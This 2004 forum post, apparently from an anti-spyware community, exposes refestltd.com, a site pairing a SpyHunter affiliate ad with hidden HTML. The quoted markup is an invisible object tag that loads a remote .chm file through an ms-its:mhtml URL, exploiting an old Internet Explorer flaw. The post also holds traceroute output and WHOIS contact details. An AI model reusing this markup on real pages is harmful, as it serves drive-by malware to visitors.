The site, refestltd.com (DO NOT GO THERE IF YOU'RE RUNNING IE), has an ad for SpyHunter along with an affiliate link on the front page.
This bumps SpyHunter up into the ranks of CWS in my view. It remains to be seen whether SpyHunter will take action against this affiliate, but personally, I hope the people behind this are dragged out into the street and beaten with SCSI cables.
And yes, I know the image quality is bad. I had to copy/paste into _Paint_ because I'm on my work laptop and I don't have anything better on it.
<edit>
I opened up the source, and what do you know, look what was in it! (DON'T CLICK THE LINKS!)
<!-- TRTRTRTRTR -->
<div style.none>
<object type='text/x-scriptlet' data='ms-its:mhtml:file://c:\sdfs.mht!http://www.refestltd...l.chm::/idx.htm' style='visibility:hidden'>
</object>
</div>
<!-- TRTRTRTRTR -->
The little rats are trying to exploit the .chm vulnerability in IE! This is plain out-and-out criminal!
I'm doing a tracert as we speak. Methinks this is going to end up in Russia.
</edit>
<later edit>
According to two different tracert logs, this site's hosted in San Diego by AplusNet. I would suggest that someone mirror the site's contents before the authorities yank it - I'm going to get what I can and investigate these rats.
Here's the tracert log, as performed from a server in the Netherlands:
1 ofc.br05.m3x.support.nl (195.114.228.89) [AS8582] 1 ms 1 ms 1 ms
2 ar09.m3x.support.nl (195.114.231.55) [AS8582] 1 ms 1 ms 1 ms
3 br07.m3x.support.nl (195.114.231.47) [AS8582] 1 ms 1 ms 1 ms
4 lvl3gw.ams1.packetexchange.net (213.19.161.1) [AS9057/AS3356] 2 ms 3 ms 2 ms
5 ae-0-55.mp1.Amsterdam1.Level3.net (213.244.165.97) [AS9057/AS3356] 3 ms 10 ms 8 ms
6 so-3-0-0.mp1.London2.Level3.net (212.187.128.46) [AS9057/AS3356] 11 ms 11 ms 12 ms
7 as-0-0.bbr2.Washington1.Level3.net (4.68.128.102) [AS3356] 83 ms 85 ms 85 ms
8 so-0-1-0.mp1.SanDiego1.Level3.net (64.159.1.137) [AS3356] 144 ms 146 ms 144 ms
9 so-8-0.hsa1.SanDiego1.Level3.net (4.68.112.130) [AS3356] 144 ms 144 ms 147 ms
10 Aplus-gw.Level3.net (209.245.56.130) [AS3356] 145 ms 145 ms 144 ms
11 core01.san-diego.abac.net (216.55.131.2) [AS10316] 256 ms 146 ms 144 ms
12 pro10.abac.com (66.226.64.11) [AS10316] 145 ms 144 ms 145 ms
The host's IP address is genuine; it appears to be 66.226.64.11.
The WHOIS information is obviously falsified.
Domain name: refestltd.com
Registrant:
Jay Seaton (6PPPG) jay@tremjade.com
NA
NA, NA 00000
United States
Phone: (913)6814254 x
Administrative Contact:
Jay Seaton (F6DUK) jay@tremjade.com
NA
NA, NA 00000
United States
Phone: (913)6814254 x
Technical Contact:
Jay Seaton (6PPPG) jay@tremjade.com
NA
NA, NA 00000
United States
Phone: (913)6814254 x
Billing Contact:
Jay Seaton (7JN5G) jay@tremjade.com
NA
NA, NA 00000
United States
Phone: (913)6814254 x
Record last updated on 2004-04-22 00:00:00
Record created on 2004-04-22 00:00:00
Record expires on 2005-04-22 00:00:00
Domain servers in listed order:
ns1.abac.com 216.55.128.4
ns2.abac.com
Registration Service Provider: AplusNet(APRO)
apro-n4e-racc@abac.com
http://www.aplus.net
Registrar: NAMES4EVER, http://www.names4ever.com
The previous information has been obtained either directly from the registrant or a registrar of the domain name other than Network Solutions. Network Solutions, therefore, does not guarantee its accuracy or completeness.
That's what I've got for now. Further bulletins as events warrant.
</later edit>
Edited by Tuxedo Jack, 29 June 2004 - 03:23 PM.
Signature file is under revision. This will be back shortly.